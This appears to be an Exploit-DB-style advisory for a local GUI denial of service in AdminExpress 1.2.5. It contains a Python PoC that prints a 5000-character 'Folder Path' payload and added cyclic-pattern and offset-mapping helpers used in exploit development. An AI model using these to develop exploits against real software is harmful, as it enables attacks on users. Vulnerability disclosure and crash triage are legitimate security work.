Vendor: AdminExpress
Author: Mücahit İsmail Aktaş
CVSS: 7.5 (HIGH)
Category: Denial of Service
CWE: 400
Product Name: AdminExpress
Affected Version From: 1.2.5
Affected Version To: 1.2.5.485
Patch Exists: Yes
Related CWE: N/A
CPE: admin-express.en.softonic.com
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows XP Professional SP2
Year: 2019

AdminExpress 1.2.5 – Denial of Service (PoC)

AdminExpress 1.2.5 (build 1.2.5.485) is vulnerable to a denial of service: an overlong string supplied in the 'Folder Path' field of the 'System Compare' dialog causes the application to stop working. The trigger requires interactive access to the application's GUI. To reproduce, click the 'System Compare' button, paste a payload of 5000 'A' characters into the 'Folder Path' field on the left, and click the scales icon to the right of that field.

Mitigation:

Upgrade to the latest available version of AdminExpress (a patched release is listed as available).

Exploit-DB raw data:

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Exploit Title: AdminExpress 1.2.5 - Denial of Service (PoC)
# Date: 2019-04-12
# Exploit Author: Mücahit İsmail Aktaş
# Software Link: https://admin-express.en.softonic.com/
# Version: 1.2.5.485
# Tested on: Windows XP Professional SP2

# Description:
#
# 1) Click the "System Compare" button
# 2) Paste the payload in the "Folder Path" (left)
# 3) Click the scales icon (in the middle, right side of "Folder Path")
#

# 5000 'A' characters: the string that, pasted into "Folder Path",
# triggers the denial of service described above.
buffer = "A" * 5000

# Print the payload so it can be copied from the terminal and pasted into the GUI.
print("Payload: \n\n" + buffer + "\n")
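The PoC above produces a single 5000-byte string. When triaging a crash like this, a tester usually wants two more things: a ladder of payload sizes to find the smallest length that still triggers the fault, and a cyclic (Metasploit-style) pattern instead of plain 'A's, so that if a debugger shows part of the input in a register or in a crash log, the bytes can be mapped back to an offset in the input. The following is an added example written for this page, not code from the original advisory or from the AdminExpress vendor; the function names, the size ladder values and the output file name are the example's own assumptions, and nothing here asserts that this particular crash is anything more than the denial of service the advisory reports.

```python
#!/usr/bin/env python3
# Added example (not from the advisory): payload generation helpers for
# triaging a length-triggered crash such as the AdminExpress "Folder Path" DoS.
import string


def make_payload(length, char="A"):
    """Fixed-character payload, the form the advisory's PoC uses (5000 x 'A')."""
    return char * length


def cyclic_pattern(length):
    """Metasploit-style cyclic pattern 'Aa0Aa1Aa2...'.

    Every position holds an uppercase letter, a lowercase letter or a digit in a
    fixed rotation, so any 4-byte window is unique within the first 20280 bytes.
    A chunk recovered from a register dump can therefore be mapped back to its
    offset in the input with pattern_offset().
    """
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    # Requested length exceeds the unique span; return what is available.
    return "".join(out)[:length]


def pattern_offset(pattern, chunk):
    """Offset of `chunk` inside `pattern`, or -1 if it is not present.

    `chunk` may be the ASCII text itself or a 32-bit value exactly as read from
    a little-endian register dump (e.g. 0x41336141), which is decoded back to
    the 4 ASCII bytes it represents.
    """
    if isinstance(chunk, int):
        chunk = chunk.to_bytes(4, "little").decode("ascii")
    return pattern.find(chunk)


def length_ladder(start=1000, stop=5000, step=1000):
    """Payload sizes to try in order (assumed values), so the smallest length
    that still triggers the fault can be narrowed down instead of relying on a
    single oversized string."""
    return list(range(start, stop + 1, step))


def write_payload(path, payload):
    """Write the payload to a text file for pasting into the GUI; returns bytes written."""
    with open(path, "w", encoding="ascii") as handle:
        handle.write(payload)
    return len(payload)


if __name__ == "__main__":
    # Same size as the advisory's PoC, but as a cyclic pattern.
    pattern = cyclic_pattern(5000)
    write_payload("payload.txt", pattern)            # assumed output file name
    print("Sizes to try:", length_ladder())
    # Example of mapping a register value back to an input offset.
    print("0x41336141 maps to offset", pattern_offset(pattern, 0x41336141))
```

Paste the contents of the generated file into the 'Folder Path' field exactly as the advisory describes; if the application is run under a debugger and a fragment of the pattern appears in a register, feeding that value to pattern_offset() tells you which part of the input ended up there, which is the information that decides whether the fault is a plain resource-exhaustion DoS or something worth investigating further.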